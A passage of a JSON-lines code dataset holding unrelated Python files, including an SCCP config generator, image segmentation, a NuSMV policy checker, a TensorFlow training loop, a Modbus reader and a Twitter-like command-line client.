0\n\nsccp.write('[lines]\\n')\nwhile (count < 500):\n sccp.write('[' + str(line_instance) + ']\\n')\n sccp.write('cid_num=' + str(line_instance) + '\\n')\n sccp.write('cid_name=' + ''.join(random.choice(string.ascii_lowercase) for _ in xrange(5)) + '\\n')\n sccp.write('language=fr_CA\\n')\n sccp.write('\\n')\n\n line_instance += 1\n count += 1 \n\n\nline_instance = 1000\ncount = 0\n\nsccpdial.write('[xivo-extrafeatures]\\n')\nsccpdial.write('[default]\\n')\n\nsccp.write('[devices]\\n')\nwhile (count < 500):\n mac = str(randomMAC())\n sccp.write('[SEP' + mac + ']\\n')\n sccp.write('devices=' + str(mac) + '\\n')\n sccp.write('line=' + str(line_instance) + '\\n')\n sccp.write('\\n')\n\n sccpsimple.write('SEP' + mac + ',' + str(line_instance) + '\\n')\n\n sccpdial.write('exten => ' + str(line_instance) + ',1,Dial(SCCP/' + str(line_instance) + ')\\n');\n# sccpws.write('skaro-dev, f, l, fr_FR, ' + str(line_instance) + ', default, sccp, 0, 0, 0, ' + ':'.join(re.findall('..',mac)) + '\\n');\n\n line_instance += 1\n count += 1\n","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"629342967","text":"import utils_img as ji\nfrom PIL import Image # Modulo basico de cargar imagenes\n#from scipy.ndimage import sobel, generic_gradient_magnitude\nfrom scipy import ndimage as ndi\nfrom numpy.lib.stride_tricks import as_strided\nfrom scipy import sparse\nfrom pathlib import Path # Para rutas \nfrom skimage.segmentation import slic, find_boundaries # SLIC algoritmo de SuperV\nimport numpy as np # Modulo arrays\nfrom skimage.future import graph\nfrom skimage import io, filters, color\nfrom skimage.feature import canny\n\n\nimport time\n\n\ninicio_de_tiempo = time.time()\n\n\n\n\ndirectorio = Path(\"C:/Users/Juan Ignacio/Documents/Movistar Cloud/TFM/img_muestra_y_destino/\")\nimagen1 = \"prueba_slic_100_pequena.tif\"\nruta1 = directorio / imagen1\n\nnumSegments= 1000 # 1 / 64\ncompactness= 0.1\n#sigma= 5 If not specified it autoadjusts\nconvert2lab= False\n\n#array= io.imread(ruta1)\narray = ji.read_tiff(ruta1,1)\n#array = np.transpose(array, (1, 0, 2))\nprint(array.shape)\nprint('Obtaining superstructures')\nsegments = slic(array,compactness=compactness, n_segments = numSegments, multichannel= False, convert2lab= convert2lab)\nprint('Number of SV: ', len(np.unique(segments)))\nsegments += 1\narray = array.astype('int64')\nmag = ndi.generic_gradient_magnitude(array, ndi.sobel, float)\nmag *= 255.0 / np.max(mag) # normalize (Q&D)\n\n\nprint('Obtaining RAG')\nrag = graph.rag_boundary(segments,mag,connectivity=1 )\nprint('Merging RAG´s segments')\nsegments2 = graph.merge_hierarchical(segments, rag,253,\n in_place_merge=True,\n rag_copy= False,\n merge_func=ji.merge_boundary,\n weight_func=ji.weight_boundary)\nprint('Final Number of SV: ', len(np.unique(segments2)))\n\n# 110\n#graph.show_rag(segments, rag, array, edge_cmap= 'viridis')\ndestino_guardar= Path('C:/Users/Juan Ignacio/Documents/Movistar Cloud/TFM/Prueba_Feima_multiframe')\n#nombre= 'prueba2D.tif'\nruta_guardado= destino_guardar\nji.save_imagen(array, segments2,ruta_guardado)\ntiempo_final = time.time() \ntiempo_transcurrido = tiempo_final - inicio_de_tiempo\nprint(tiempo_transcurrido)\n\n'''\narray = array.astype('uint8')\nbordes2d= find_boundaries(segments2, connectivity= 1, mode='thick')\narray[bordes2d]= 177\nimagen= Image.fromarray(array)\ndestino_guardar= Path('C:/Users/Juan Ignacio/Documents/Movistar Cloud/TFM/img_muestra_y_destino')\nnombre= 'prueba2D.tif'\nruta_guardado= destino_guardar / nombre\nimagen.save(ruta_guardado)\n'''","sub_path":"prueba2.py","file_name":"prueba2.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"626761017","text":"'''\nTested:\n Python 3.3.0\n Microsoft SQL Server 2008\n'''\n\nimport time\nimport random\nimport adodbapi\nimport threading\n\n'''\n 简单定时器类\n'''\nclass Timer(threading.Thread):\n def __init__(self,fn,args=(),sleep = 0):\n threading.Thread.__init__(self)\n self.fn = fn\n self.args = args\n self.interval = sleep\n self.setDaemon(True)\n self.enable = True\n self.running = False\n\n def __do(self):\n self.running = True\n self.fn(*self.args)\n self.running = False\n\n def run(self):\n while self.enable :\n time.sleep(self.interval)\n self.__do()\n\n def stop(self):\n #stop the loop\n self.enable = False\n while True:\n if not self.running : break\n time.sleep(0.01)\n\n'''\n 简单数据库访问类\n'''\nclass DbHelper:\n def __init__(self,conn):\n self.conn = conn;\n try:\n self.connect = adodbapi.connect(conn,120)\n self.cursor = self.connect.cursor();\n except EnvironmentError as err:\n print('connection failure:' + err);\n\n def getConn(self):\n return self.conn;\n\n def getDbTime(self):\n self.cursor.execute(\"select getdate()\");\n daterow = self.cursor.fetchone();\n return str(daterow[0]);\n\n def execNoResult(self,sql):\n self.cursor.execute(sql);\n self.connect.commit();\n\n def getExecResult(self,sql):\n self.cursor.execute(sql)\n return self.cursor.fetchall();\n\n def closeConn(self):\n try:\n self.cursor.close();\n self.connect.commit();\n self.connect.close();\n except EnvironmentError as err:\n print('close connection failure:' + err);\n\n# def getConnection():\n# dbprov = 'SQLOLEDB' # ADO can use OLE\n# dbserv = '192.168.1.118,1433'\n# dbuser = 'sa'\n# dbpwd = 'pwd'\n# dbname = 'water'\n# return 'Provider=%s;Data Source=%s;Initial Catalog=%s;User ID=%s;Password=%s;' % (dbprov, dbserv, dbname, dbuser, dbpwd )\n#\n# def updateRawData():\n# dbClass = DbHelper(getConnection());\n#\n# try:\n# for row in dbClass.getExecResult(\"select * from rawdata\"):\n# dbClass.execNoResult(\"update rawdata set value='{0}',proc_date=getdate() where pos='{1}'\".format( \"%.2f\" % random.uniform(0,20),row[0]));\n# print(\"update success->\" + dbClass.getDbTime());\n# dbClass.closeConn();\n# except EnvironmentError as err:\n# print('connection failure:' + err);\n#\n# Timer(updateRawData,sleep=5).run()","sub_path":"class/operMsSql.py","file_name":"operMsSql.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"415209888","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n# author:caozy time:19-1-6\nfrom django.conf.urls import url\n\nfrom . import views\nfrom rest_framework_jwt.views import obtain_jwt_token\n\nurlpatterns = [\n url(r'^usernames/(?P\\w{5,20})/count/$',views.RegisterUsernameCountView.as_view(),name='usernames'),#用户名验证\n url(r'^phones/(?P[1][3,4,5,7,8][0-9]{9})/count/$',views.RegisterMobileCountView.as_view(),name='mobiles'),#手机号验证\n url(r'^$',views.RegisterView.as_view(),name='register'),#注册功能\n # url(r'^auths/$', obtain_jwt_token,name='auths'),\n url(r'^auths/$', views.UserAuthorizationView.as_view(),name='auths'),\n url(r'^infos/$',views.UserCenterInfoView.as_view(),name='infos'),\n url(r'^emails/$',views.UserEmailInfoView.as_view(),name='emails'),\n url(r'^emails/verification/$',views.UserEmailVerifyView.as_view(),name='verify'),\n url(r'^browerhistories/$', views.UserBrowsingHistoryView.as_view(), name='history'),\n\n]\n\n# app_name='users'\nfrom rest_framework.routers import DefaultRouter\nrouter=DefaultRouter()\nrouter.register(r'addresses',views.AddressViewSet,base_name='address')\n# router.register(r'addresses/title',views.AddressViewSet,base_name='title')\n\nurlpatterns+=router.urls\n","sub_path":"mall/apps/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"276098892","text":"import tensorflow as tf\nfrom configuration import EPOCHS, CHANNELS, BATCH_SIZE, NUM_CLASSES, IMAGE_HEIGHT, IMAGE_WIDTH\nimport math\n\n\ndef _parse_image_function(example_proto):\n # Parse the input tf.Example proto.\n return tf.io.parse_single_example(example_proto, {\n 'label': tf.io.FixedLenFeature([], tf.dtypes.int64),\n 'image': tf.io.FixedLenFeature([], tf.dtypes.string),\n })\n\n\ndef process_features(features, data_augmentation):\n image_raw = features['image'].numpy()\n image_tensor_list = []\n for image in image_raw:\n image_tensor = load_and_preprocess_image(image, data_augmentation=data_augmentation)\n image_tensor_list.append(image_tensor)\n images = tf.stack(image_tensor_list, axis=0)\n labels = features['label'].numpy()\n\n return images, labels\n\n\ndef get_parsed_dataset(tfrecord_name):\n raw_dataset = tf.data.TFRecordDataset(tfrecord_name)\n parsed_dataset = raw_dataset.map(_parse_image_function)\n return parsed_dataset\n\n\ndef load_and_preprocess_image(image_raw, data_augmentation=False):\n # decode\n image_tensor = tf.io.decode_image(contents=image_raw, channels=CHANNELS, dtype=tf.dtypes.float32)\n\n if data_augmentation:\n image = tf.image.random_flip_left_right(image=image_tensor)\n image = tf.image.resize_with_crop_or_pad(image=image,\n target_height=int(IMAGE_HEIGHT * 1.2),\n target_width=int(IMAGE_WIDTH * 1.2))\n image = tf.image.random_crop(value=image, size=[IMAGE_HEIGHT, IMAGE_WIDTH, CHANNELS])\n image = tf.image.random_brightness(image=image, max_delta=0.5)\n else:\n image = tf.image.resize(image_tensor, [IMAGE_HEIGHT, IMAGE_WIDTH])\n\n return image\n\n\ndef generate_datasets(train_tfrecord, valid_tfrecord, b_size):\n train_dataset = get_parsed_dataset(tfrecord_name=train_tfrecord)\n valid_dataset = get_parsed_dataset(tfrecord_name=valid_tfrecord)\n # test_dataset = get_parsed_dataset(tfrecord_name=test_tfrecord)\n\n train_count = get_the_length_of_dataset(train_dataset)\n valid_count = get_the_length_of_dataset(valid_dataset)\n # test_count = get_the_length_of_dataset(test_dataset)\n\n # read the dataset in the form of batch\n train_dataset = train_dataset.batch(batch_size=b_size)\n valid_dataset = valid_dataset.batch(batch_size=b_size)\n # test_dataset = test_dataset.batch(batch_size=b_size)\n\n return train_dataset, valid_dataset, train_count, valid_count \n\n\ndef get_the_length_of_dataset(ds):\n cnt = 0\n for di in ds:\n cnt += 1\n return cnt\n\n\ndef get_model(name=\"squeezenet\"):\n if name == \"squeezenet\":\n from models import squeezenet\n return squeezenet.SqueezeNet()\n\n\nif __name__ == \"__main__\":\n gpus = tf.config.list_physical_devices(\"GPU\")\n save_model_dir = \"/workspace/saved/\"\n save_every_n_epoch = 1\n print(EPOCHS)\n # configuration.EPOCHS = 200\n if gpus:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n train_dataset, valid_dataset, train_count, valid_count = generate_datasets(\"./train.tfrecords\", \"./val.tfrecords\", 10)\n model = get_model()\n\n # define loss and optimizer\n loss_object = tf.keras.losses.SparseCategoricalCrossentropy()\n optimizer = tf.keras.optimizers.RMSprop()\n\n train_loss = tf.keras.metrics.Mean(name='train_loss')\n train_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='train_accuracy')\n\n valid_loss = tf.keras.metrics.Mean(name='valid_loss')\n valid_accuracy = tf.keras.metrics.SparseCategoricalAccuracy(name='valid_accuracy')\n \n # @tf.function\n def train_step(image_batch, label_batch):\n with tf.GradientTape() as tape:\n predictions = model(image_batch, training=True)\n loss = loss_object(y_true=label_batch, y_pred=predictions)\n gradients = tape.gradient(loss, model.trainable_variables)\n optimizer.apply_gradients(grads_and_vars=zip(gradients, model.trainable_variables))\n\n train_loss.update_state(values=loss)\n train_accuracy.update_state(y_true=label_batch, y_pred=predictions)\n\n # @tf.function\n def valid_step(image_batch, label_batch):\n predictions = model(image_batch, training=False)\n v_loss = loss_object(label_batch, predictions)\n\n valid_loss.update_state(values=v_loss)\n valid_accuracy.update_state(y_true=label_batch, y_pred=predictions)\n\n # start training\n for epoch in range(EPOCHS):\n step = 0\n for features in train_dataset:\n step += 1\n images, labels = process_features(features, data_augmentation=True)\n train_step(images, labels)\n print(\"Epoch: {}/{}, step: {}/{}, loss: {:.5f}, accuracy: {:.5f}\".format(epoch,\n EPOCHS,\n step,\n math.ceil(train_count / BATCH_SIZE),\n train_loss.result().numpy(),\n train_accuracy.result().numpy()))\n\n for features in valid_dataset:\n valid_images, valid_labels = process_features(features, data_augmentation=False)\n valid_step(valid_images, valid_labels)\n\n print(\"Epoch: {}/{}, train loss: {:.5f}, train accuracy: {:.5f}, \"\n \"valid loss: {:.5f}, valid accuracy: {:.5f}\".format(epoch,\n EPOCHS,\n train_loss.result().numpy(),\n train_accuracy.result().numpy(),\n valid_loss.result().numpy(),\n valid_accuracy.result().numpy()))\n train_loss.reset_states()\n train_accuracy.reset_states()\n valid_loss.reset_states()\n valid_accuracy.reset_states()\n\n if epoch % save_every_n_epoch == 0:\n model.save_weights(filepath=save_model_dir+\"epoch-{}\".format(epoch), save_format='tf')\n\n\n # save weights\n model.save_weights(filepath=save_model_dir+\"model\", save_format='tf')\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"312877268","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\nThis module contains functions that provide aggregate summaries of graphs including visualization with matplotlib,\nprinting summary information, and exporting summarized graphs\n\n\"\"\"\n\nfrom __future__ import print_function\n\nimport logging\n\nimport networkx as nx\nimport pandas as pd\n\nfrom pybel.struct.summary.node_summary import count_functions\nfrom .edge_summary import count_relations\nfrom .provenance import count_unique_authors, count_unique_citations\n\n__all__ = [\n 'plot_summary_axes',\n 'plot_summary',\n 'info_list',\n 'info_str',\n 'info_json',\n 'print_summary',\n]\n\nlog = logging.getLogger(__name__)\n\n\ndef plot_summary_axes(graph, lax, rax, logx=True):\n \"\"\"Plots your graph summary statistics on the given axes.\n\n After, you should run :func:`plt.tight_layout` and you must run :func:`plt.show` to view.\n\n Shows:\n 1. Count of nodes, grouped by function type\n 2. Count of edges, grouped by relation type\n\n :param pybel.BELGraph graph: A BEL graph\n :param lax: An axis object from matplotlib\n :param rax: An axis object from matplotlib\n\n Example usage:\n\n >>> import matplotlib.pyplot as plt\n >>> from pybel import from_pickle\n >>> from pybel_tools.summary import plot_summary_axes\n >>> graph = from_pickle('~/dev/bms/aetionomy/parkinsons.gpickle')\n >>> fig, axes = plt.subplots(1, 2, figsize=(10, 4))\n >>> plot_summary_axes(graph, axes[0], axes[1])\n >>> plt.tight_layout()\n >>> plt.show()\n \"\"\"\n ntc = count_functions(graph)\n etc = count_relations(graph)\n\n df = pd.DataFrame.from_dict(dict(ntc), orient='index')\n df_ec = pd.DataFrame.from_dict(dict(etc), orient='index')\n\n df.sort_values(0, ascending=True).plot(kind='barh', logx=logx, ax=lax)\n lax.set_title('Number of nodes: {}'.format(graph.number_of_nodes()))\n\n df_ec.sort_values(0, ascending=True).plot(kind='barh', logx=logx, ax=rax)\n rax.set_title('Number of edges: {}'.format(graph.number_of_edges()))\n\n\ndef plot_summary(graph, plt, logx=True, **kwargs):\n \"\"\"Plots your graph summary statistics. This function is a thin wrapper around :func:`plot_summary_axis`. It\n automatically takes care of building figures given matplotlib's pyplot module as an argument. After, you need\n to run :func:`plt.show`.\n\n :code:`plt` is given as an argument to avoid needing matplotlib as a dependency for this function\n\n Shows:\n\n 1. Count of nodes, grouped by function type\n 2. Count of edges, grouped by relation type\n\n :param pybel.BELGraph graph: A BEL graph\n :param plt: Give :code:`matplotlib.pyplot` to this parameter\n :param kwargs: keyword arguments to give to :func:`plt.subplots`\n\n Example usage:\n\n >>> import matplotlib.pyplot as plt\n >>> from pybel import from_pickle\n >>> from pybel_tools.summary import plot_summary\n >>> graph = from_pickle('~/dev/bms/aetionomy/parkinsons.gpickle')\n >>> plot_summary(graph, plt, figsize=(10, 4))\n >>> plt.show()\n \"\"\"\n fig, axes = plt.subplots(1, 2, **kwargs)\n lax = axes[0]\n rax = axes[1]\n\n plot_summary_axes(graph, lax, rax, logx=logx)\n plt.tight_layout()\n\n return fig, axes\n\n\ndef info_list(graph):\n \"\"\"Returns useful information about the graph as a list of tuples\n\n :param pybel.BELGraph graph: A BEL graph\n :rtype: list\n \"\"\"\n number_nodes = graph.number_of_nodes()\n result = [\n ('Nodes', number_nodes),\n ('Edges', graph.number_of_edges()),\n ('Citations', count_unique_citations(graph)),\n ('Authors', count_unique_authors(graph)),\n ('Network density', nx.density(graph)),\n ('Components', nx.number_weakly_connected_components(graph)),\n ]\n\n try:\n result.append(('Average degree', sum(graph.in_degree().values()) / float(number_nodes)))\n except ZeroDivisionError:\n log.info('Graph has no nodes')\n\n if graph.warnings:\n result.append(('Compilation warnings', len(graph.warnings)))\n\n return result\n\n\ndef info_json(graph):\n \"\"\"Returns useful information about the graph as a dictionary\n\n :param pybel.BELGraph graph: A BEL graph\n :rtype: dict\n \"\"\"\n return dict(info_list(graph))\n\n\ndef info_str(graph):\n \"\"\"Puts useful information about the graph in a string\n\n :param pybel.BELGraph graph: A BEL graph\n :rtype: str\n \"\"\"\n return '\\n'.join('{}: {}'.format(k, v) for k, v in info_list(graph))\n\n\ndef print_summary(graph, file=None):\n \"\"\"Prints useful information about the graph\n\n :param pybel.BELGraph graph: A BEL graph\n :param file: A writeable file or file-like object. If None, defaults to :data:`sys.stdout`\n \"\"\"\n print(info_str(graph), file=file)\n","sub_path":"src/pybel_tools/summary/export.py","file_name":"export.py","file_ext":"py","file_size_in_byte":4673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"493396011","text":"#!/usr/bin/env python3\n\nimport copy\nimport datetime\nimport subprocess\nimport pprint\nimport time\nimport os\nimport tempfile\n\nimport Boolean as MyBoolean\n\nclass CTLPolicy:\n def __init__(self, string):\n self.boolean = MyBoolean.Boolean(string)\n\n def getConditions(self):\n yield from self.boolean.getConditions()\n\n def getConstraints(self, controller):\n for condition in self.boolean.getConditions():\n yield from condition.getConstraints()\n\n def getRelatedVariables(self, controller, graph):\n for condition in self.boolean.getConditions():\n yield from condition.getVariables()\n\n def dumpNumvModel(self, controller):\n string_list = [controller.dumpNumvModel()]\n string_list.append('')\n string_list.append(' SPEC AG ({});'.format(self.boolean.getString()))\n return '\\n'.join(string_list)\n\n def findWhichRules(self, previous_state, current_state, transitions, controller):\n rules = set()\n\n for channel_variable in current_state:\n current_value = current_state[channel_variable]\n previous_value = previous_state[channel_variable]\n\n if current_value == previous_value:\n continue\n\n if channel_variable not in transitions:\n rules.add('ENV')\n continue\n\n for boolean, value, rule_name in transitions[channel_variable]:\n if boolean == 'next(attack)' and current_state['attack'] == 'TRUE':\n rules.add('ATTACK')\n break\n\n if controller.checkRuleSatisfied(previous_state, boolean):\n rules.add(rule_name)\n break\n\n return rules\n\n def parseOutput(self, output, controller):\n index = output.index('-- specification')\n output = output[index:]\n\n lines = output.splitlines()\n lines = [line.strip() for line in lines]\n if lines[0].endswith('true'):\n return {'result': 'SUCCESS'}\n\n transitions = controller.getTransitions()\n states = list()\n rules = list()\n current_state = dict()\n\n # get initial state\n index = 4\n if lines[4].startswith('-- Loop starts here'):\n index += 1\n\n while index + 1 < len(lines):\n index += 1\n line = lines[index]\n\n if line.startswith('-> State: 1.2 <-'):\n break\n\n if line.startswith('-- Loop starts here'):\n continue\n\n channel_variable, value = line.split(' = ')\n current_state[channel_variable] = value\n states.append(current_state)\n\n while index + 1 < len(lines):\n previous_state = current_state\n current_state = copy.copy(previous_state)\n\n while index + 1 < len(lines):\n index += 1\n line = lines[index]\n\n if line.startswith('-> State: '):\n break\n\n if line.startswith('-- Loop starts here'):\n continue\n\n channel_variable, value = line.split(' = ')\n current_state[channel_variable] = value\n\n rule = self.findWhichRules(previous_state, current_state, transitions, controller)\n states.append(current_state)\n rules.append(rule)\n\n return {'result': 'FAILED', 'states': states, 'rules': rules}\n\n def check(self, controller, timeout, bmc):\n model = self.dumpNumvModel(controller)\n _, filename = tempfile.mkstemp(suffix='.smv')\n with open(filename, 'w') as f:\n f.write(model)\n\n checking_start = time.perf_counter()\n try:\n cmds = ['NuSMV', '-keep_single_value_vars'] + (['-bmc'] if bmc else []) + [filename]\n p = subprocess.run(cmds, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=timeout)\n except subprocess.TimeoutExpired:\n return filename, None, timeout\n checking_time = time.perf_counter() - checking_start\n\n output = p.stdout.decode('UTF-8')\n result = self.parseOutput(output, controller)\n\n return filename, result, checking_time\n\n\n\n","sub_path":"SafeChain/SimpleCTLPolicy.py","file_name":"SimpleCTLPolicy.py","file_ext":"py","file_size_in_byte":4206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"249791472","text":"from pymodbus.constants import Endian\nfrom pymodbus.payload import BinaryPayloadDecoder\nfrom pymodbus.payload import BinaryPayloadBuilder\nfrom pymodbus.client.sync import ModbusSerialClient as serialClient\nimport datetime\nclient = serialClient(\nmethod='ascii',\nport='COM12',\nbaudrate=115200,\ntimeout=3,\nparity='E',\nstopbits=1,\nbytesize=7 )\nprint(\"Communication on: {}\".format(client))\nprint(client.connect())\nwhile client.connect():\n resNum = int(input('Enter res number: '))\n try:\n result = client.read_holding_registers(address=resNum,count=100,unit=1)\n print(result.registers)\n\n except:\n print(\" Error \")","sub_path":"pysv2test copy.py","file_name":"pysv2test copy.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"276845860","text":"\r\nfrom teleframework.shortcuts import *\r\n\r\nfrom bot.info import info\r\n\r\nfrom bot.participate import participar_node\r\n\r\n\r\ndef start_command(ctx: BaseContext):\r\n return info(ctx)\r\n\r\n\r\ndef setup(tf: TeleFramework):\r\n\r\n tf.register_path(\r\n '',\r\n Node()\r\n )\r\n\r\n tf.register_command(\r\n '/start',\r\n start_command\r\n )\r\n\r\n tf.register_command(\r\n '/participar',\r\n lambda ctx: Redirect.create_to(['participar'])\r\n ).register_path(\r\n 'participar',\r\n participar_node\r\n )\r\n\r\n\r\n\r\n","sub_path":"bot/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"590665106","text":"from utils import InputParser\nfrom ls8_emulator import LS8Parser, CPU\n\nif __name__ == \"__main__\":\n input_parser = InputParser()\n filename = input_parser[0]\n\n ls8_parser = LS8Parser()\n ls8_parser.parse(filename)\n\n cpu = CPU()\n cpu.load_program(ls8_parser.lines_of_code)\n cpu.start()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"86200255","text":"import pymongo, re, itertools\nimport pandas as pd\nfrom pymongo import MongoClient\nfrom collections import Counter\n\nclient = MongoClient()\ndb = client.test\ncollection = db.tweets\ndata = pd.DataFrame(list(collection.find()))\n\ndef tokenize(s):\n return re.split(r'#\\w+|@\\w+| ', s)\n \ndata['tokens'] = data['text'].apply(tokenize)\ntoken_list = list(itertools.chain(*data['tokens']))\ntoken_list = [x.lower() for x in token_list]\ntoken_list = [x.strip('| |.|,|;|:') for x in token_list]\n\nimport csv\nwith open('deutsche-stoppwoerterliste.txt', 'rb') as file:\n reader = csv.reader(file)\n stopword_list = list(reader)\nfrom compiler.ast import flatten\nstopword_list = flatten(stopword_list)\n\nstopwords = []\nfor word in stopword_list:\n stopwords.append(unicode(word))\n \ntoken_list_clean = [x for x in token_list if x not in stopwords]\nCounter(token_list_clean).most_common(45)\n\ndata['neg_keyword'] = data['tokens'].apply(lambda s : s.count('entgleist'))\ndata['pos_keyword'] = data['tokens'].apply(lambda s: s.count('liebe'))\n\n","sub_path":"first steps/analyze_tweets.py","file_name":"analyze_tweets.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"308955453","text":"from urllib.request import *\nfrom urllib.error import *\nfrom bs4 import BeautifulSoup\n\ndef getTitle(url):\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n try:\n bsObj = BeautifulSoup(html.read(),features=\"html.parser\")\n title = bsObj.title\n except AttributeError as e:\n return None\n return title\n\ndef main():\n title = getTitle(\"https://www.w3.org/TR/html401/struct/global.html\")\n if(title == None):\n print(\"Title couldn't be found\")\n else:\n print(title)\n\nmain()","sub_path":"src/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"427970829","text":"class RileyStrategy:\n def __init__(self,player_index):\n self.player_index = player_index\n\n def will_colonize_planet(self,colony_ship_loc,game_state):\n enemy_base = game_state['players'][0 if self.player_index == 1 else 1]\n if self.calc_distance(enemy_base, colony_ship_loc) > 2:\n return True\n else:\n return False\n \n def decide_ship_movement(self,ship_index, game_state):\n ship = game_state['players'][self.player_index]['units'][ship_index]\n enemy_home = game_state['players'][0 if self.player_index !=0 else 1]['home_coords']\n\n if ship['coords'][0]>enemy_home[0]:\n return (-1,0)\n elif ship['coords'][0]enemy_home[1]:\n return (0,-1)\n elif ship['coords'][1]= 12:\n return cr\n elif cp >= 9:\n return ds\n else:\n return sc\n\n def decide_purchases(self,game_state):\n units = []\n tech = []\n\n spawn_loc = game_state['players'][self.player_index]['home_coords']\n cp = game_state['players'][self.player_index]['cp']\n ship_size_tech = game_state['players'][self.player_index]['technology']['shipsize']\n\n if 'Base' not in [unit['type'] for unit in self.game_state['players'][self.player_index]['units']]:\n ship_choice = ['Base', 12]\n ship_choice = self.decide_purchase(self, cp, ship_size_tech)\n\n while cp >= ship_choice[1]:\n if ship_size_tech<2:\n ship_size_price = ((ship_size_tech)*5)\n if cp > ship_size_price:\n ship_size_tech+=1\n tech.append('shipsize')\n cp -= ship_size_price\n \n else:\n if cp >= ship_choice[1]:\n units.append({'type':ship_choice[0], 'coords':spawn_loc})\n cp -= ship_choice[1]\n \n ship_choice = self.decide_purchase(self, cp, ship_size_tech)\n\n return {'units':units,'technology':tech}\n \n def decide_removals(self, game_state):\n i = 0\n while True:\n if game_state['players'][self.player_index]['units'][i]['alive']:\n return game_state['players'][self.player_index]['units'][i]['unit_num']\n else:\n i+=1\n\n def decide_which_unit_to_attack(self, combat_state, location, attacking_ship_index):\n for entry in combat_state[location]:\n if entry['player'] != combat_state[location][attacking_ship_index]['player']:\n return combat_state[location].index(entry)\n\n def decide_which_units_to_screen(self, combat_state):\n return []\n\n def calc_distance(self,unit1_loc, unit2_loc):\n return (((unit1_loc[0]-unit2_loc[0])**2) + ((unit1_loc[1] - unit2_loc[1])**2))**(0.5)","sub_path":"src/strategies/riley_strategy.py","file_name":"riley_strategy.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"549510946","text":"import argparse\nimport ipaddress\nimport requests\nimport datetime\nimport time\nimport os\nimport json\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-H\", \"--host\",\n help=\"IP address of the Tweetcool server\",\n default='127.0.0.1') # Equals 'localhost'\nparser.add_argument(\"-P\", \"--port\",\n help=\"Post used by the Tweetcool server\",\n type=int,\n default=9876)\nargs = parser.parse_args()\n\ntry:\n server = {\n 'host': ipaddress.ip_address(args.host),\n 'port': args.port\n }\nexcept ValueError as e:\n print('The given host is not a valid IP address')\n exit(0)\n\nif not(1024 < server[\"port\"] < 65535):\n print('The given port number is not in the range between 1024 and 65535!')\n exit(0)\n\nserver[\"address\"] = 'http://' + server[\"host\"].compressed + ':' + str(server[\"port\"])\n\n# Logic starts here... somewhere..\n\n\ndef tweet_posting():\n requests.post(server['address'] + \"/tweet\", json={\"poster\": input(\"Poster: \"), \"content\": input(\"Tweet: \")})\n return tweet_listing()\n\n\ndef tweet_listing(filters={}):\n [print(\"{} <{}>: {}\".format(i[\"poster\"], datetime.datetime.fromtimestamp(i[\"timestamp\"]), i[\"content\"]))\n for i in json.loads(requests.get(server['address']+\"/tweet\", params={\"poster\": \"\", \"from\": 0, **filters}).text)]\n\n\ndef tweet_filtering():\n poster, date = input(\"Poster: \"), input(\"Date(YYYY-MM-DD HH:MM): \")\n try:\n if date:\n date = time.mktime(datetime.datetime.strptime(date, \"%Y-%m-%d %H:%M\").timetuple())\n return tweet_listing({\"poster\": poster, \"from\": date})\n except:\n print(\"Wrong timeformat\")\n\nwhile True:\n print(\"\\nTweetcool server client\\n\"+\"-\"*50+\"\\n(1) Post tweet\\n(2) Past tweets\\n(3) Filter tweets\\n(0) Quit\")\n try:\n choice = input(\"Select option: \")\n os.system(\"clear\")\n exec({\"1\": \"tweet_posting()\", \"2\": \"tweet_listing()\", \"3\": \"tweet_filtering()\", \"0\": \"exit()\"}[choice])\n except KeyError:\n print(\"Invalid option\")\n except EOFError:\n print()\n exit()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"21559547","text":"\n####################################################################################################\n#\n# DO NOT WORRY ABOUT ANY OF THE STUFF IN THIS SECTION. THIS HELPS YOU IMPLEMENT.\n#\n#\n\n\n# Import functions and objects the microservice needs.\n# - Flask is the top-level application. You implement the application by adding methods to it.\n# - Response enables creating well-formed HTTP/REST responses.\n# - requests enables accessing the elements of an incoming HTTP/REST request.\n#\nfrom flask import Flask, Response, request\nfrom datetime import datetime\nimport json\nimport src.data_service.data_table_adaptor as dta\n\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nlogger = 